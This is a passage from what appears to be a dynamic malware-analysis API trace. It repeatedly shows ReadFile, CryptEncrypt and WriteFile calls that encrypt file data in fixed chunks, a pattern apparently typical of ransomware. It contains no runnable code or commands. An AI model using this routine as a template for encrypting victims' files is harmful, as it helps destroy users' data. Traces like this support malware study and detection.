lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.635] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.635] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.636] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.636] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.636] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.636] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.636] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.636] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.636] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.636] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.636] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.637] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.637] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.637] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.637] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.637] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.637] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.637] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.637] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.637] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.637] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.637] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.637] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.637] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.637] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.637] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.638] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.638] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.638] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.638] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.638] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.638] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.638] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.638] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.638] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.638] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.638] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.638] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.638] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.638] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.638] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.639] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.639] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.639] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.639] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.639] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.639] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.639] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.639] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.639] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.639] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.639] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.639] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.639] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.639] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.640] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.640] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.640] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.640] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.641] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.641] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.641] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.641] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.641] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.641] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.641] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.641] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.641] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.641] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.641] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.641] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.641] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.641] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.641] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.642] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.642] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.642] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.642] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.642] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.642] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.642] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.642] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.642] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.642] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.642] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.642] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.642] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.642] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.642] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.643] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.643] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.643] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.643] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.643] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.643] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.643] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.643] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, 